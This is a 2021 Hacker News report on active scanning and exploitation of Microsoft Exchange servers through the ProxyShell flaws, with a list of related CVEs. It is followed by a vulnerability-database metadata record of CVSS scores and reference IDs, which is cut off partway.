[](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)
Threat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.
The remote code execution flaws have been collectively dubbed "ProxyShell." At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.
"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities," NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a "C# aspx webshell in the /aspnet_client/ directory."
Patched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.
The vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.
Since then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.
Three other issues — known as ProxyShell — could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.
**ProxyLogon:**
* [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
* [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
* [**CVE-2021-26858**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
* [**CVE-2021-27065**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
**ProxyOracle:**
* [**CVE-2021-31195**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)
* [**CVE-2021-31196**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>) \- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)
**ProxyShell:**
* [**CVE-2021-31207**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \- Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)
* [**CVE-2021-34473**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)
* [**CVE-2021-34523**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)
**Other:**
* [**CVE-2021-33768**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33768>) \- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)
Originally demonstrated at the [Pwn2Own hacking competition](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the [Black Hat USA 2021](<https://www.blackhat.com/us-21/briefings/schedule/index.html#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange-server-23442>) and [DEF CON](<https://www.youtube.com/watch?v=5mqid-7zp8k>) security conferences last week. To prevent exploitation attempts, organizations are highly recommended to install updates released by Microsoft.
Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.
{"id": "THN:FA40708E1565483D14F9A31FC019FCE1", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Hackers Actively Searching for Unpatched Microsoft Exchange Servers", "description": "[](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nThreat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.\n\nThe remote code execution flaws have been collectively dubbed \"ProxyShell.\" At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.\n\n\"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\" NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a \"C# aspx webshell in the /aspnet_client/ directory.\"\n\nPatched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.\n\nThe vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.\n\nSince then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.\n\nThree other issues \u2014 known as ProxyShell \u2014 could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.\n\n**ProxyLogon:**\n\n * [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26858**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-27065**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n\n**ProxyOracle:**\n\n * [**CVE-2021-31195**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)\n * [**CVE-2021-31196**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)\n\n**ProxyShell:**\n\n * [**CVE-2021-31207**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)\n * [**CVE-2021-34473**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)\n * [**CVE-2021-34523**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)\n\n**Other:**\n\n * [**CVE-2021-33768**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33768>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)\n\nOriginally demonstrated at the [Pwn2Own hacking competition](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the [Black Hat USA 2021](<https://www.blackhat.com/us-21/briefings/schedule/index.html#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange-server-23442>) and [DEF CON](<https://www.youtube.com/watch?v=5mqid-7zp8k>) security conferences last week. To prevent exploitation attempts, organizations are highly recommended to install updates released by Microsoft.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-08-13T09:46:00", "modified": "2021-08-13T09:46:09", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/08/hackers-actively-searching-for.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34473", "CVE-2021-34523"], "immutableFields": [], "lastseen": "2022-05-09T12:39:14", "viewCount": 12702, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070"]}, {"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:223AC3BF-AD6E-4AEA-960A-DE258EE301A0", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:5E706DDA-98EC-49CA-AB21-4814DAF26444", "AKB:6F1D646E-2CDB-4382-A212-30728A7DB899", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0099", "CPAI-2021-0107", "CPAI-2021-0476", "CPAI-2021-0900"]}, {"type": "cisa", "idList": ["CISA:16DE226AFC5A22020B20927D63742D98", "CISA:8C51810D4AACDCCDBF9D526B4C21660C"]}, {"type": "cve", "idList": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31198", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523"]}, {"type": "exploitdb", "idList": ["EDB-ID:49879", "EDB-ID:49895"]}, {"type": "fireeye", "idList": ["FIREEYE:C650A7016EEAD895903FB350719E53E3", "FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "githubexploit", "idList": ["0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "13364575-934B-5E73-AA03-AEB6910F6AD2", "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "14573955-860C-5947-8F2F-86347A606742", "18D647E9-D7D4-5591-B16C-05D007AFD726", "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "256984DC-A742-53F8-889F-2071EC134734", "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "3019C843-FE2F-527C-B7C1-14A1C3066721", "35B21CE7-1E51-5824-B70E-36480A6E8763", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "4987606C-EB9B-581F-913D-36468DE9160E", "4AC49DB9-A784-561B-BF92-94209310B51B", "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "7275794A-F2F6-51E6-B514-185E494D8A3F", "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "7395180E-85B1-5253-9975-F93BE4693139", "7758268F-2004-536A-B51F-62DA1E5A992D", "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "7F4F3321-8955-51B4-B195-7C1F647A6C84", "81FEB23C-D090-5CE8-9B92-00BE597DE052", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "9E82678F-0559-56B2-94DC-6505FE64555C", "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "E458F533-4B97-51A1-897B-1AF58218F2BF", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "F5339382-9321-5B96-934D-B803353CC9E3"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F2305684A25C735549865536AA4254BF"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B"]}, {"type": "kaspersky", "idList": ["KLA12103", "KLA12169", "KLA12224"]}, {"type": "krebs", "idList": ["KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078", "MS:CVE-2021-31195", "MS:CVE-2021-31196", "MS:CVE-2021-31198", "MS:CVE-2021-31206", "MS:CVE-2021-31207", "MS:CVE-2021-33768", "MS:CVE-2021-34470", "MS:CVE-2021-34473", "MS:CVE-2021-34523"]}, {"type": "mskb", "idList": ["KB5000871", "KB5000978", "KB5001779", "KB5003435", "KB5004778", "KB5004779", "KB5004780"]}, {"type": "msrc", "idList": ["MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "nessus", "idList": ["EXCHANGE_CVE-2021-26855.NBIN", "EXCHANGE_PROXYSHELL.NBIN", "HAFNIUM_IOC_DETECT.NBIN", "SMB_NT_MS21_APR_EXCHANGE.NASL", "SMB_NT_MS21_JUL_EXCHANGE.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SMB_NT_MS21_MAY_EXCHANGE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:163895"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:B0EFD469309D1127FA70F0A42934D5BC", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:05A653A5E863B78EDD56FD74F059E02E", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502"]}, {"type": "saint", "idList": ["SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:2232AFF7B86AF6E40FEC6191FAD74DCC", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE"]}, {"type": "securelist", "idList": ["SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:A823F31C04C74DD103337324E6D218C9", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1"]}, {"type": "seebug", "idList": ["SSV:99334"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "TALOSBLOG:D6DE736915C69A194D894AE9BED7EC57"]}, {"type": "thn", "idList": ["THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:25143CA85A0297381CEBBBD35F24F85B", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:97FD375C23B4E7C3F13B9F3907873671", "THN:9AB21B61AFE09D4EEF533179D0907C03", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A73831555CB04403ED3302C1DDC239B1", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:F2A3695D04A2484E069AC407E754A9C1"]}, {"type": "threatpost", "idList": ["THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:18C67680771D8DB6E95B3E3C7854114F", "THREATPOST:1B1BF3F545C6375A88CD201E2A55DF23", "THREATPOST:1CEC18436389CF557E4D0F83AE022A53", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:34CC110D7F26B1B4D3B97BE05F000B69", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:A2FE619CD27EBEC2F6B0C62ED026F02C", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdi", "idList": ["ZDI-21-819", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36667"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070"]}, {"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0099", "CPAI-2021-0107", "CPAI-2021-0476"]}, {"type": "cisa", "idList": ["CISA:16DE226AFC5A22020B20927D63742D98", "CISA:8C51810D4AACDCCDBF9D526B4C21660C"]}, {"type": "cve", "idList": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31196", "CVE-2021-33768", "CVE-2021-34473", "CVE-2021-34523"]}, {"type": "exploitdb", "idList": ["EDB-ID:49879", "EDB-ID:49895"]}, {"type": "fireeye", "idList": ["FIREEYE:C650A7016EEAD895903FB350719E53E3"]}, {"type": "githubexploit", "idList": ["F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B"]}, {"type": "kaspersky", "idList": ["KLA12103", "KLA12169", "KLA12224"]}, {"type": "krebs", "idList": ["KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/EXCHANGE_PROXYLOGON_COLLECTOR/", "MSF:AUXILIARY/SCANNER/HTTP/EXCHANGE_PROXYLOGON/", "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYLOGON_RCE/", "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYSHELL_RCE/", "MSF:ILITIES/MSFT-CVE-2021-26857/", "MSF:ILITIES/MSFT-CVE-2021-26858/"]}, {"type": "mmpc", "idList": ["MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-31196", "MS:CVE-2021-33768", 